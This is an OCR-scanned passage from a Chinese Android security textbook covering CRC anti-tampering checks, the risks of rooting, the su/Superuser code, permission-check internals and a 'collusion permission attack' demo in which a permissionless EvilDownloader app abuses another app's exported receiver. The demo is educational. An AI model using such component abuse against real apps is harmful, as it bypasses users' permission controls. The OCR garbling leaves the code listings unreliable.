量 ， 笔 者 采用 CRC 作 为 classes.dex 的 校 验算 法 。 另 外 ， 每 一 次 编译 代码 
后 ， 软 件 的 CRC 都 会 改变 ， 因 为 ， 无 法 在 代码 中 保存 它 的 值 来 进行 判 
断 ， 文 件 的 CRC 校 验 值 可 以 保存 到 Assert 目 录 下 的 文件 或 字符 串 资源 

中 ， 也 可 以 保存 到 网 络 上 ， 软 件 运行 时 再 联网 读 取 ， 笔 者 为 了 方便 ， 选 
择 了 前 一 种 方法 ， 相 应 的 代码 如 下 : 


private boolean checkCRC() { 





boolean beModified = false; 

long crc = Long.parseLong(getstring(R.string.crc)); 

ZipFile zf; 

tr 渤 
zf = new ZipFilel(getApplicationContext() .getPackageCodePath()); 
// 获 取 apk 安 装 后 的 路 径 


ZipEntry ze = zf.getEntry("classes.dex"); // 获 取 apk 文 件 中 的 classes .dex 
Log.d("com.droider.checkcrc", String.valueOf (ze.getCrc())); 
if (ze.getCrc() == crc) { / /检查 CRC 


beModified = true; 
} 

} catch (IOException e) { 
e.printstackTrace(); 
beModified = false; 

} 


return beModified; 


} 
检查 检验 值 的 完整 代码 读者 可 以 参看 本 书 配套 源 代 码 中 本 小 节 的 
CheckCRC 工 程 。 


10.5 本章 小 结 


本 章 介 绍 了 一 些 和 常见 的 Android 软 件 防 人 破解 方法 ， 将 这 些 方 法 结合 
起 来 可 以 大 大 提高 软件 的 安全 性 ， 读 者 在 实际 编写 代码 的 过 程 中 应 多 多 
使 用 。 另 外 ， 读 者 也 要 学 会 总 结 自己 的 经 验 ， 争 取 寻 找 出 更 为 有 效 的 保 
护 方法 。 








第 11 音 Android 系统 攻击 与 防范 


在 本 章 开 头 ， 笔 者 先 提 出 一 个 问题 : 您 觉得 自己 的 手机 安全 吗 ? 

在 很 多 人 看 来 ， 这 可 能 是 个 很 简单 的 问题 ， 阅 读本 书 的 读者 大 多 数 
都 具备 Android 软 件 开 友 的 能 力 ， 了 解 Android 开 发 中 第 用 的 组 件 ， 和 懂得 
如 何 让 软件 拥有 更 好 的 用 户 体 验 。 但 您 真 的 知道 Android 系 统 中 哪些 环 
节 容 易 受 到 攻击 ， 哪 些 代 码 容易 给 用 户 囊 来 潜在 的 安全 隐患 吗 ? 











11.1 _ Android 系统 安全 概述 





Android 系 统 安全 的 话题 比较 大 ， 它 涉及 到 不 同 的 安全 环节 。 首 先 
是 用 户 环 节 ， 这 个 环节 永远 是 最 薄弱 的 ， 你 永远 不 能 指望 用 户 中 规 中 甜 
地 使 用 手机 ， 对 于 国内 大 多 数 Android 手 机 用 户 来 说 ，ROOT 手 机 几乎 快 
成 了 使 用 手机 过 程 中 必须 要 做 的 事情 ， 然 而 又 有 多 少 人 知道 ， 手 机 
ROOT 后 会 带 来 多 大 的 安全 隐患 。 本 章 将 在 11.2 节 讨论 手机 ROOT 所 带 来 
的 安全 隐患 ， 以 及 手机 ROOT 的 原理 。 

除了 手机 的 使 用 者 外 ， 软 件 开 发 人 员 自 号 也 可 能 是 Android 系 统 受 
到 攻击 的 “罪魁 祸首 ”， 看 到 这 段 话 ， 可 能 有 许多 读者 要 跟 我 急 了 : 我 们 
是 软件 的 创造 者 ， 创 造 了 无 数 个 实用 的 软件 ， 伴 随 用 户 度 过 了 许多 美好 
的 时 光 ， 我 们 是 Android 世 界 里 最 可 爱 的 人 。 笔 者 不 得 不 承认 这 是 多 么 
真 减 的 呼声 ， 也 不 能 不 肯定 他 们 为 软件 行业 做 出 的 巨大 贡献 ， 笔 者 自己 
也 是 从 事 Android 软 件 开发 这 个 行业 ， 这 其 中 的 体会 自然 也 是 非常 深刻 
的 。 但 事实 情况 就 是 这 样 ， 系 统 安 全 问题 很 多 情况 下 是 由 第 三 方 软件 引 
起 的 ， 比 如 下 面 将 要 介绍 的 Android 组 件 安全 、 数 据 安 全 ， 和 希望 读者 在 
看 完 相 应 的 小 节 后 ， 还 能 够 大 声 地 说 :我 的 软件 是 安全 的 。 

最 后 要 讲 的 是 手机 的 ROM 安 全 了 ， 这 是 一 个 普遍 存在 而 无 人 谈 及 
的 话题 。 现 在 是 时 候 将 它 拿 出 来 说 一 说 了 。 

















11.2 手机 ROOT 带 来 的 危害 


手机 ROOT 是 指 让 手机 在 使 用 过 程 中 能 够 获取 root 权 限 ， 即 最 高 管 
理 员 权限 。 很 多 人 将 手机 ROOT 说 成 ROOT 手机 、 手 机 rooting 或 手机 破 
解 ， 其 含义 是 一 样 的 。 





11.2.1 为 什么 要 ROOT 手机 


通常 ， 厂 疝 出 于 手机 安全 考虑 ， 生 产 出 的 手机 在 出 三 后 都 是 不 具备 
root 权 限 的 ， 这 样 用 户 在 使 用 时 就 会 有 诸多 限制 。 比 如 ， 手 机 出 三 时 捆 
绑 的 软件 ， 这 些 软件 不 仅 占 用 手机 存储 空间 ， 而 且 由 于 它们 是 系统 软 
件 ， 所 以 无 法 删除 ， 要 想 保 留 一 个 “干将 ” 的 系统 ， 只 能 ROOT 手机 。 其 
次 ， 手 机 无 法 获取 root 权 限 ， 也 就 意味 着 软件 中 需要 使 用 到 root 权 限 的 
操作 都 将 失效 ， 一 些 特殊 功能 的 软件 就 无 法 使 用 ， 这 对 于 部 分 用 户 来 
说 ， 是 非常 恼火 的 ， 为 了 能 够 使 用 这 部 分 软件 ， 只 能 选择 ROOT 自己 的 
手机 。 最 后 一 类 ROOT 手机 的 人 应 该 属于 手机 发 烧 友 了 ， 他 们 为 了 妃 求 
更 高 的 手机 性 能 、 个 性 化 的 手机 系统 ， 自 己 动手 修改 手机 系统 ， 然 而 所 
有 这 些 对 系统 的 操作 都 需要 有 root 权 限 ， 因 此，ROOT 手 机 对 他 们 来 说 
就 是 必须 要 做 的 事情 了 。 


11.2.2 手机 ROOT 后 带 来 的 安全 隐患 


手机 ROOT 后 的 确 方便 了 用 户 ， 但 同时 也 带 来 了 许多 安全 隐患 ， 笔 
者 总 结 了 一 下 ， 有 如 下 几 点 : 

1. 系统 不 稳定 

很 多 用 户 在 ROOT 手机 后 ， 为 了 让 手机 运行 的 更 加 流畅 ， 会 对 系统 


























中 的 软件 进行 精 减 。 这 个 过 程 中 就 有 可 能 误 删 系统 重要 文件 ， 导 致 系统 
运行 不 稳定 或 损坏 。 为 了 规避 因为 ROOT 手机 而 造成 的 系统 损坏 ， 手 机 
厂商 们 现在 都 已 经 明确 规定 了 : 手机 ROOT 后 将 失去 保修 ! 因此 ， 用 户 
在 ROOT 手机 前 需要 考虑 清楚 ， 是 否 真 的 需要 ROOT 手机 ” 

2. 病毒 侵入 

手机 ROOT 后 所 有 软件 都 能 够 获得 root 权 限 ， 这 无 疑 给 手机 病毒 带 
来 了 更 多 “发 展 ? 空 间 。 没 有 root 权 限 的 手机 ， 用 户 可 以 检查 软件 使 用 的 
权限 来 判断 是 否 有 恶意 行为 ， 一 旦 手机 ROOT 后 ， 恶 意 软件 将 不 会 直接 
申请 需要 使 用 的 权限 ， 所 有 特定 的 功能 病毒 都 可 以 在 root 权 限 下 完成 。 
虽然 有 权限 管理 软件 控制 软件 获取 root 权 限 ， 但 用 户 通 常 无 法 得 知 软件 
使 用 root 权 限 的 用 途 ， 一 般 情况 下 都 会 选择 放行 ， 这 样 权限 管理 软件 就 
形同虚设 了 。 

3. 隐私 数据 暴露 

有 Android 软 件 开发 经 验 的 读者 都 知道 ，Android 软 件 在 安装 后 都 有 
个 属于 自己 的 程序 目录 ， 软 件 中 的 所 有 私有 数据 都 存放 在 这 个 目录 
下 ， 用 户 与 其 它 软件 都 没有 访问 权限 。 一 旦 手机 ROOT 后 ， 这 些 数据 就 
全 部 暴露 出 来 了 ， 例 如 IM 类 软件 的 聊天 记录 、 网 银 账 号 名 与 密码 ， 这 
些 数 据 都 是 用 户 的 个 人 隐私 ， 如 果 汇 露 可 能 面临 巨大 的 经 济 损失 ， 其 至 
对 个 人 形象 造成 不 良 的 影响 。 









































11.2.3” ”Android 手 机 ROOT 原 理 


手机 ROOT 是 通过 已 经 公布 的 Android 系 统 本 地 提 权 漏洞 ， 借 助 漏洞 
利用 程序 来 提升 系统 的 用 户 权 限 。 手 机 ROOT 分 为 临时 ROOT 与 永久 
ROOT， 临 时 ROOT 是 指 临 时 性 的 获取 系统 root 权 限 ， 不 对 系统 进行 任何 
修改 ， 而 永久 ROOT 是 指 修改 Android 系 统 ， 手 机 可 以 随时 的 获取 root 权 
限 。 








截止 到 笔者 编写 完 本 章 时 ，Android 系 统 的 本 地 提 权 漏洞 一 共 出 现 
过 8 个 。 读 者 可 以 下 载 X-ray for Android 程 序 来 检测 自己 的 手机 是 否 可 以 





通过 这 8 个 漏洞 来 获取 root 权 限 ，X-ray for Android 可 以 使 用 手机 访问 
http://www.xray.io/dl 进 行 下 载 。 在 笔者 的 Moto XT615 上 面 运行 X-ray for 
Android， 其 扫 拉 结果 如 图 11-1 所 示 ， 只 有 Gingerbreak 漏 洞 可 以 提 权 。 
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Vulnerable 


Gingerbreak A 


Last analyzed 10 月 12th, 2012 





Not Vulnerable 


Wunderbar 
Last analyzed 8 月 24th, 2012 


Exploid 


Last analyzed = 24th, 2012 


ASHMEM 


Last analyzed 8 月 23rd, 2012 


ZergRush 


Last analyzed 8 月 24th, 2012 


Zimperlich 
Last analyzed 8 月 23rd, 2012 








图 11-1 X-ray for Android 扫 描 结果 








市 场 上 的 手机 一 键 ROOT 工具 都 是 基于 这 些 漏 洞 来 获取 root 权 限 
的 ， 当 选择 永久 ROOT 后 ，ROOT 工 具 就 会 向 手机 系统 的 /sysrem/app 日 
录 写 入 root 权 限 管理 软件 (通常 是 Superuser.apk) ， 以 及 癌 /system/bin 
或 /system/xbin 目 录 写 入 su 程序 。 下 面 我 们 来 看 看 ，su 与 Superuser.apk 是 
如 何 协作 ， 对 系统 进行 root 权 限 管理 的 。 

目前 su 与 Superuser.apk 是 由 ChainsDD 维 护 的 ， 其 项 目地 址 为 
https://github.com/ChainsDD。 笔 者 下 载 的 源码 中 ，su 的 版 本 为 3.0.3.2， 
Superuser 的 版 本 为 3.0.7， 接 下 来 的 分 析 中 笔者 以 这 两 个 版 本 为 准 。 

我 们 从 su 的 main() 函 数 逐 行 往 下 看 ，su 程 序 的 核心 功能 由 allow0 与 
deny() 两 个 函数 组 成 ， 在 经 过 计算 获取 到 了 命令 行 参数 与 命令 后 ， 会 执 


行 以 下 代码 。 

if (su from.uid == AID ROOT || s from.uid == AID_ ‘SHELL) 
allow(shell, orig_umask); /7 放行 

if (stat (REQUESTOR_DATA_PATH, &st) < 0) { 
PLOGE ("stat"); 
deny (); / /拒绝 

} 

EE Fb. eb yd 4 BE, Pt VE 


2 直 


} 


LOGE ("Bad uid/gid %d/%d for Superuser Requestor application", 
jE nid ntyac. nt gladys 
deny (); / /拒绝 


(mkdir (REQUESTOR_CACHE PATH,， 0770) >= 0) { // 创 建 cache 目 录 
chown (REQUESTOR_CACHE_ PATH, st.st_ uid, st.st_gid); 


setgroups (0, NULL),; 


setegidl(st.st_gid); 


seteuidl(st.st uid); 


AID_ROOT 与 AID_SHELL 分 别 是 root 与 shell 用 户 ， 对 这 两 种 类 型 用 


户 ，Su 直 接 放行 ，statO 函 数 会 检查 手机 是 个 安装 有 Superuser.apk， 没 有 
驶 会 拒绝 提升 su 权限 。 条 件 满 足 驶 继续 判断 gid 与 uid 是 人 否 相 同 ， 不 相同 
则 同样 拒绝 提升 su 权限 ， 接 下 来 调用 mkdir 创 建 cache 目 录 并 调用 chown 

更 改 目 录 的 所 有 者 ，cache 目 录 的 完整 路 径 

为 /data/data/com.noshufou.android.su/cache， 最 后 是 调用 setegid 与 seteuid 
设置 组 ID 与 用 户 ID。 接 下 来 就 要 检查 su 的 权限 数据 库 中 保存 的 设置 了 ， 








代码 如 下 。 
db = database_init(); 
if (!db) { /1 打开 数据 库 失败 


LOGE("sudb - Could not open database, prompt user"),; 
dballow = DB_INTERACTIVE; 
} else { 
LOGE("sudb - Database opened"); 
dballow = database_check(db, &su_from, &su_to); / /执行 检查 
sqlite3_close (db); // 关 闭 数据 库 
db = NULL; 
LOGE("sudb - Database Closed" ) ; 
} 


switch (dballow) { / /判断 返回 结果 
case DB_DENY: deny(); / /拒绝 
case DB_ALLOW: allow(shell, orig umask); / /放行 
case DB_INTERACTIVE: break; // 欧 互 
default: deny(); // 拒 绝 


人 试 打 开 permissions.sqlite 数 据 库 文 件 ， 如 果 打 开 失 败 
就 设置 dballow 的 值 为 DB_INTERACTIVE， 打 开 成 功 就 调用 
database_check (0 检查 是 否 保存 有 相应 的 权限 请 求 记 录 ， 然 后 返回 结果 给 
dballow，dballow 一 共有 3 种 状态 ，DB_DENY 表 示 拒 绝 ，DB_ALLOW 表 
示 放 行 ，DB_INTERACTIVE 表 示 该 程序 是 第 一 次 请 求 root 权 限 ， 需 要 弹 
出 交互 窗口 让 用 户 来 选择 是 否 放行 。 

allow0 与 deny0 的 最 后 一 行 代 码 都 调用 了 exit0， 也 束 是 说 它们 执行 




















后 su 程序 就 退出 了 。 如 果 上 面 的 Switch 分 支 判断 中 ，dballow 的 结果 不 是 
DB_INTERACTIVE， 程 序 到 这 里 就 不 会 同 下 执行 了 ， 我 们 接着 看 
dballow 为 DB_INTERACTIVE 的 情况 ， 代 码 如 下 。 


socket_serv_fqd = socket create temp(); // 创 建 socket 

IE (Socket serv fd < 0) { 
deny (); / /拒绝 

} 

signal (SIGHUP, cleanup_signal); 

signal (SIGPIPE, cleanup_signal); 

signal (SIGTERM, cleanup_ signal); 

signal (SIGABRT, cleanup_ signal); 

atexit (cleanup); 

if (send_ intent(&su_ from, &su to, socket path, -1, 0) < 0) { / /发 送 Intent 
deny (); / /拒绝 

} 

if (socket_ receive_result(socket_serv_fd, buf, sizeof (buf)) < 0) { 

/ /接收 返回 结果 


deny (); / /拒绝 
} 
close(socket serv_fd); // 关 闭 socket 
socket_cleanup(); / /释放 socket 
result = buf; / /返回 的 结果 
if (!strcmp(result, "DENY")) { / /比较 返回 结果 
deny (); / /拒绝 
} else if (!strcmp(result, "ALLOW")) { 
allow(shell, orig umask); /1 放行 
} else { 


LOGE ("unknown response from Superuser Requestor: $®%s", result); 


deny (); // 拒 绝 
} 
deny (); / /拒绝 
return -1; // 返 回 -1 


这 段 代 码 是 通过 Socket| 向 Superuser.apk 发 送 root 权 限 请 求 ， 然 后 根据 
返回 的 结果 判断 是 拒绝 还 是 放行 。 下 面 是 SuperUser.apk 的 工作 了 ， 上 面 
的 权限 请 求 会 被 SuperUser.apk 的 SuRequestReceiver 广 播 接 收 者 收 到 ， 它 
的 onReceive() 方 法 代码 如 下 。 





public void onReceive (Context context, Intent intent) { 
SharedPreferences prefs = PreferenceManager .getDefaultSharedPreferences 
(context); 
String automaticAction = prefs.getString (Preferences.AUTOMATIC_ACTION, 
"prompt"); 
if (automaticAction.equals("deny")) {  // 读 取 sharedProferences 中 prompt 
的 值 检 查 是 否 为 deny 

sendResult (context，intent，false); // 返 回 拒绝 结果 


return; 

} else if (automaticAction.equals ("allow")) {  // 判 启 prompt 的 值 是 否 为 allow 
sendResult (context, intent, true); /7 返回 放行 结果 
return; 


} 
if (prefs.getBoolean("permissions dirty", false)) {//SharedProferences 
中 permissions_dirty 的 值 
Log.d(TAG, "Database is dirty, check here"); 
String where = Apps.UID + "=? AND " + Apps .EXEC_UID + "=? AND " 
+ Apps.EXEC_CMD + "=?"; / /构造 查询 字符 串 的 where 语 句 
Log.d(TAG, where); 
Cursor C = Context .getContentResolver() .query (Apps .CONTENT_URI, 
// 执 行 查询 
new String[] { ApPs.ALLOW }, 
ApPS .UID + "=? AND " + Apps .EXEC UID + "=? AND " + Apps.EXEC CMD + "=?", 
new String[] { String.valueOf (intent .getIntExtra (EXTRA CALLERUID, -1)), 
String.valueOf (intent .getIntExtra (EXTRA_UID, -1)), 
String.valueOf (intent .getStringExtra (EXTRA_CMD)) }, null); 
if (c.moveToFirst()) {  // 移 动 游标 到 查询 记录 的 开始 处 
Log.d(TAG, "Found an entry"); 
switch (c.getInt(0})) 1 
case Apps.AllowType.ALLOW: /1 放行 


Log.Q(TAG， "Allow"); 
sendResult (context, intent, true); 
break; 

case Apps.AllowType .DENY: // 拒 绝 
Log.Q(TAG， "Deny" ) ; 


sendResult (context, intent, false); 


break; 
default: 
Log.d(TAG, "Prompt"); 
showPrompt (context, intent); // 弹 出 交互 窗口 
} 
} else { 
Log.d(TAG, "No entry found, prompt"); 
showPrompt (context, intent); /1 弹出 交互 窗口 
} 
c.close(); / /关闭 游标 
return; 


} 

int sysTimeout = prefs.getInt (Preferences.TIMEOUT, 0); // 读 取 用 户 操 作 响 
应 的 时 间 

if ( sysTimeout > 0) { 


String key = "active_" + intent.getIintExtra (EXTRA CALLERUID, 0); 
long timeout = prefs.getLong (key, 0); 
if (System.currentTimeMillis() < timeout) ({ 


sendResult (context, intent, true); /1 返回 放行 结果 
return; 

} else { 
showPrompt (context, intent); // 弹 出 交互 窗口 
return; 

} 

} else { 
showPrompt (context, intent); /1/ 弹 出 交互 窗口 
return; 


广播 接收 者 首先 通过 SharedProferences 读 取 prompt 的 值 ， 判 断 用 户 
是 否 在 Superuser.apk 中 设置 root 权 限 请 求 为 自动 处 理 ， 如 果 设 置 了 自动 
处 理 ， 那 么 就 根据 它 的 值 来 自动 返回 拒绝 或 放行 。 反 之 ， 就 到 
Superuser.apk 的 权限 数据 库 中 搜索 权限 规则 ， 然 后 根据 查询 结果 来 进行 
相应 处 理 ， 如 果 查 询 的 结果 即 不 是 Apps.AllowType.ALLOW， 人 也 不 是 




















Apps.AllowType.DENY， 就 调用 showPrompt0 弹 出 交互 窗口 ， 
showPromptO 的 代码 如 下 。 
private void showPrompt (Context context, Intent intent) { 
Intent prompt = new Intent (context, SuRequestActivity.class); 
prompt .putExtras (intent); 
prompt .addFlags (Intent.FLAG_ACTIVITY NEW_TASK); 
context.startActivity (prompt); 
} 
在 笔者 的 Moto XT615 (已 经 ROOT) 上 首次 运行 Root Explorer， 会 


弹出 权限 请 求 窗口 ， 如 图 11-2 所 示 ， 该 窗口 就 是 showPromptO 执 行 后 的 
效果 。 


PE 
超级 用 户 请 求 


Root Explorer 正在 请 求 超级 用 户 权 限 


注意 : 如 果 这 个 请 求 不 是 您 触发 的 ， 或 者 您 不 


as 文 仆 讲 求 前 党 恒 癌 下 拒绝 它 上 FF 太 李 
起 起 这 个 请 求 ， 通 弟 情 见 下 拒绝 它 比 较 好 


点 击 展开 信息 


拒绝 





图 11-2 root 权限 请 求 


SuRequestActivity 会 啊 应 允许 按钮 与 拒绝 按钮 的 点 击 事件 ， 两 个 按 
钮 都 是 通过 sendResult() 来 完成 事件 处 理 的 。sendResult() 会 做 两 件 事 : 第 
一 件 事 是 通过 SharedProferences 来 保存 用 户 的 操作 结果 ， 包 括 是 否 记 住 




















选择 、 人 允许 或 拒绝 、 当 前 时 间 等 ， 第 二 件 事 是 通过 socket 回 su 发 送 用 户 
操作 结果 。showPrompt0 执 行 返 回 后 ， 会 检查 用 户 操作 是 否 超时 ， 如 果 
超时 就 重新 弹出 权限 请 求 提 示 。 

Superuser.apk 除 了 对 普通 程序 的 root 权 限 请 求 进行 控制 外 ， 还 提供 
了 NEFC、SecretCode、PinCode 的 权限 请 求 监 控 ， 不 过 要 想 开 局 这 些 功能 
还 得 更 改 Superuser.apk 的 源 代码 ， 详 细 的 代码 笔者 在 此 就 不 展开 了 ， 有 
兴趣 的 读者 可 以 目 己 阅读 Superuser.apk 的 源 代 人 码 。 


11.3 Android 权 限 攻 击 


| 


Android 权 限 机 制 是 Android 系 统 提供 的 基础 安全 措施 。 本 节 将 介 
Android 权 限 的 工作 机 制 ， 以 及 如 何 对 其 进行 攻击 。 


11.3.1 Android 权 限 检查 机 制 


Android 系 统 通 过 权限 来 控制 软件 想 要 使 用 的 功能 ， 程 序 默 认 情况 
下 没有 权限 去 进行 特定 的 操作 ， 例 如 打 电 话 、 发 短信 ， 软 件 要 想 进行 这 
些 操作 必须 显 式 地 申请 相应 的 权限 。 如 果 没 有 申请 权限 而 执行 特定 的 操 
作 ， 软 件 在 运行 时 通常 会 抛 出 一 个 SecurityException 异 常 。 申 请 权限 的 
方法 很 简单 ， 只 需要 在 程序 的 AndroidManifest.xml 文 件 中 添加 相应 的 权 
限 代 码 即 可 。 例 如 在 程序 中 使 用 发 送 短信 功能 ， 需 要 在 
AndroidManifest.xzml 中 添加 下 面 这 行 代码 。 


<uses-permission android:name="android.permission.SsSEND_ SMS"/> 


所 有 可 以 使 用 的 权限 位 于 系统 源码 的 
frameworks\base\data\etc\platform.xml 文 件 中 。 其 中 的 权限 可 以 分 为 两 大 
类 : 直接 读 写 设备 的 底层 (low-level) 权限 与 间接 读 写 设备 的 高 层 

Chigh-level) 权限 。 
android.permission.INTERNET 权 限 属于 底层 权限 ， 它 的 声明 如 下 。 


<permission name="android.permission.INTERNET" > 




















<gGEeUD Gl1d="1inet" /> 
</permission> 
name 指 定 了 权限 的 名 称 ，gid 指 定 了 所 关联 的 用 户 组 。 
android.permission.INTERNET 权 限 关 联 了 inet 用 户 组 ， 当 软件 中 声明 了 
该 权限 后 ， 运 行 时 的 进程 所 属 的 用 户 就 会 添加 到 inet 用 户 组 ， 我 们 可 以 
编写 下 面 的 代码 进行 测试 。 


private String getMyID() { 

Stvring str = null;: 

tt 下 
java.1lang.Process process=Runtime.getRuntime() .exec("id"); 
InputStream input = process.getIinputStream(); 
BufferedReader in = new BufferedReader!( 

new InputSstreamReader (process.getInputSstream(), "GBK")); 

str = in.readLine(); 
input.close(); 

} catch (IOException e) { 
e.printSstackTrace(); 

} 

Sewr. Ery 


} 

Runtime.getRuntime() 执 行 的 系统 id 命 令 用 于 输出 当前 用 户 的 uid、 
gid 以 及 用 户 组 信息 。 运 行 本 小 节 的 Permission 实 例 ， 效 果 如 图 11-3 所 
示 ， 可 以 发 现 当 前 程序 的 用 户 已 经 属于 inet 组 了 。 


国 5554:Android2. 3 了 3. 了 


low-level Permission 


本 程序 用 户 信息 : uid=10035(app_35) 
gid=10035(app_35) groups=3003(inet) 





图 11-3 ”Prmission 实 例 运行 结果 


高 层 权 限 与 底层 权限 不 同 ， 高 层 权 限 是 通过 Framework 层 的 权限 检 
碍 代码 来 进行 权限 控制 的 。 例 如 下 面 的 代码 。 











private boolean CheckNetworkState() { 
boolean flag = false; 


ConnectivityManager manager = (ConnectivityManager)getSystemServicel 
Context .CONNECTIVITY SERVICE); 
if(manager .getActiveNetworkInfo() != null) { 


flag = manager .getActiveNetworkIinfo().isAvailable!(); 
} 
return flag; 


Ce ee 于 检查 当前 网 络 状 态 是 否 可 用 ， 其 中 调 
用 的 ConnectivityManager 类 的 getActiveNetworkInfo() 方 法 就 需要 使 用 到 
android.permission.ACCESS_NETWORK_STATE 权 限 ， 该 权限 就 属于 高 
层 权 限 。 我 们 来 看 一 下 getActiveNetworkInfo0) 方 法 的 实现 。 


public NetworkInfo getActiveNetworkInfo() { 





enforceAccessPermission(); 
final int uid = Binder.getCallingUid(); 
return getNetworkInfo(mActiveDefaultNetwork, uid),; 
} 
enforceAccessPermission() 用 于 执行 权限 检查 ， 它 的 代码 如 下 。 
private void enforceAccessPermission() { 
mContext.enforceCallingOrSelfPermission!( 
android.Manifest.permission.ACCESS NETWORK_STATE, 
"ConnectivityService"); 
} 
原来 是 调用 enforceCallingOrSelfPermission() 方 法 来 检查 的 ， 该 方法 
的 作用 是 检查 是 否 声 明了 访问 网 络 状态 的 权限 
android.permission.ACCESS_NETWORK_STATE， 如 果 没 有 就 抛 出 
SecurityException 安 全 异常 中 止 程序 。 其 实 还 有 很 多 其 它 的 权限 检查 方 
法 ， 它 们 都 是 由 继承 自 Context 的 ContextImpl 类 来 实现 的 。 根 据 检查 的 
内 容 与 处 理 的 方法 不 同 ， 可 以 将 权限 检查 方法 分 为 以 下 几 类 : 
e。 检查 权限 并 返回 结果 型 


public int checkPermission(String permission, int pid, int uid) 








public int checkCallingPermissionl(String permission) 


public int checkCallingOrSelfPermission(String permission) 


e 检查 权限 失败 抛 出 异常 型 
publicvoid enforcePermission( String permission, int pid, int uid, String message) 
public void enforceCallingPermission(String permission, String message) 
public void enforceCallingOrSelfPermission!( String permission, String message) 
e Uri 权限 控制 型 
public void grantUriPermission(String toPackage, Uri uri, int modeFlags) 
public void revokeUriPermission(Uri uri, int modeFlags) 
e。 Uri 权 限 检查 并 返回 结果 型 
public int checkUriPermission(Uri uri, int pid, int uid, int modeFlags) 
public int checkCallingUriPermission(Uri uri, int modeFlags) 
public int checkCallingOrSelfUriPermission(Uri uri, int modeFlags) 
public int checkUriPermission(Uri uri, String readPermission, 

String writePermission, int pid, int uid, int modeFlags) 
e。 Uri 权 限 检查 失败 抛 出 异常 型 
public void enforceUriPermission(Uri uri, int pid, int uid, int modeFlags, 
String message) 
public void enforceCallingUriPermission(Uri uri, int modeFlags, String 
message) 
public void enforceCallingOrSelfUriPermission(Uri uri, int modeFlags, String 
message) 
public void enforceUriPermission( Uri uri, String readPermission, String 
writePermission, 


int pid, int uid, int modeFlags, String message) 
每 个 权限 检查 的 控制 粒度 与 处 理 方法 都 不 同 ， 根 据 处 理 的 对 象 不 
同 ， 它 们 又 可 以 分 为 一 般 的 权限 检查 与 Uri 的 权限 检查 两 大 类 。 权 限 检 
查 的 对 象 可 以 是 Permission 字 符 串 匹配 、pid、tid、Uri。 我 们 接着 上 面 查 


看 enforceCallingOrSelfPermission() 方 法 的 代码 。 
public void enforceCallingOrSelfpPermission!( 








String permission, String message) { 
enforce (permission, 

checkCallingOrSelfPermission(permission), 
CEG 
Binder .getCallingUid(), 
message); 

} 

enforce() 方 法 判断 checkCallingOrSelfPermission () 的 权限 检查 结果 ， 


如 果 结 果 不 为 PackageManager.PERMISSION_GRANTED， 则 抛 出 
SecurityException 异 常 。 代 码 如 下 。 


private void enforcel 
String permission, int resultOfCheck, 


boolean selfToo, int uid, String message) { 


if (resultOfCheck != PackageManager .PERMISSION GRANTED) { 
throw new SecurityException( 
(message != null ? (message + ": ") : "") + 
(selfToo 
? "Neither user " + uid + " nor current process has " 
: "User " + uid + " does not have ") + 


permission + 
".") ; 
} 
} 
其 它 权限 检查 方法 的 代码 笔者 就 不 讨论 了 ， 有 兴趣 的 读者 可 以 自己 
阅读 Android 系 统 源码 中 的 ContextImpl.java 文 件 。 


11.3.2 串 谋 权限 攻击 


Android 程 序 中 资源 的 访问 包括 使 用 Framework 提 供 的 功能 与 访问 其 
它 程 序 的 组 件 ， 前 者 是 通过 系统 提供 的 权限 机 制 进行 控制 的 ， 后 者 是 通 
过 上 自 定义 权限 控制 的 。 正 常情 况 下 ， 没 有 声明 特定 的 访问 权限 ， 就 无 法 
访问 这 些 资 源 。 但 通过 其 它 程 序 中 可 访问 的 Android 组 件 ， 就 有 可 能 突 
破 这 种 访问 控制 ， 从 而 提升 程序 本 和 丑 的 权限 ， 这 种 权限 提升 的 攻击 方式 
笔者 在 此 将 它 称 为 串 谋 权限 攻击 。 

串 谋 权限 攻击 的 原理 如 图 11-4 所 示 。 程 序 1 本 映 无 任何 权限 ， 它 的 
组 件 2 想 要 “联网 下 载 文件 并 保存 到 SD 卡 上 ”， 这 在 正常 情况 下 是 不 允许 
的 ， 程 序 2 拥 有 联网 与 写 SD 卡 的 权限 ， 并 实现 了 文件 下 载 与 保存 的 功 
能 ， 此 时 程序 1 的 组 件 2 可 以 通过 访问 程序 2 的 组 件 1 来 实现 文件 的 下 载 ， 
从 而 突破 Android 系 统 的 权限 控制 机 制 。 








程序 1 程序 2 




















组 件 1 组 件 ”| 一 一 组 件 1 组 件 2 


不 允许 允许 
, | 


联网 下 载 文件 并 保存 到 SD 卡 上 | 








图 11-4 上 串 谋 权限 攻击 
本 节 的 实例 DownloadManager 模 拟 了 一 个 下 载 管 理 程序 ， 输 入 想 要 


下 载 的 文件 URL， 点 击 下 载 按钮 即 开始 下 载 ， 下 载 下 来 的 文件 默认 保存 
到 SD 卡 上 。 程 友 的 运行 效果 如 图 11-5 所 示 。 
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图 11-5 DownloadManager 实 例 


DownloadManager 拥 有 下 载 文 件 与 保存 到 SD 卡 上 的 权限 ， 是 正规 
的 “有 权 ” 一 族 。 它 的 AndroidManifest.xml 文 件 中 有 如 下 两 行 权限 的 声 
明 。 











<uses-permission android:name="android.permission.WRITE EXTERNAL STORAGE"/> 


<uses-permission android:name="android.permission.INTERNET"/> 
下 载 文件 的 功能 是 通过 接收 下 载 请 求 广播 ， 然 后 在 下 载 广播 接收 者 
中 完成 的 ， 相 应 的 广播 接收 者 在 AndroidManifest.xml 中 声明 如 下 。 





<receiver android:name=" .DownloadReceiver"> 
<intent-filter> 
<action android:name="com.droider.download"></action> 
</intent-filter> 
</receiver> 
DownloadReceiver 啊 应 Action 为 “com.droider.download” 的 广播 ， 然 
后 访问 IPntent 指 定 的 URL 地 址 去 下 载 文件 ， 相 应 的 广播 啊 应 代码 如 下 。 


public void onRecelilVve (Context context, Intent intent) { 





if (intent.getAction() .equals("com.droider.download")) 1{ 
String url = intent .getExtras() .getstring ("url"); 
String fileName = intent .getExtras() .getstring ("filename"); 
Toast .makeText (context, url, Toast.LENGTH SHORT) .show!(); 
tr 
downloadFile (url，fileName) ; // 下 载 文件 
} catch (IOException e) { 


e.printStackTrace(); 


} 

需要 下 载 的 文件 是 通过 url 字 符 串 传递 过 来 的 ， 保 存 的 文件 名 则 是 
filename 传 递 过 来 的 。 下 面 来 看 看 我 们 的 攻击 程序 EvilDownloader， 它 什 
么 权限 都 没有 ， 只 有 一 段 发 送 文件 下 载 请 求 的 代码 。 


btnl.setonClickListener(new OnClickListener() 1{ 





QOverride 
public void onClick(View v) { 
Intent intent = new Intent(); / /创建 Intent 对 象 
intent.setAction("com.droider.download"); 
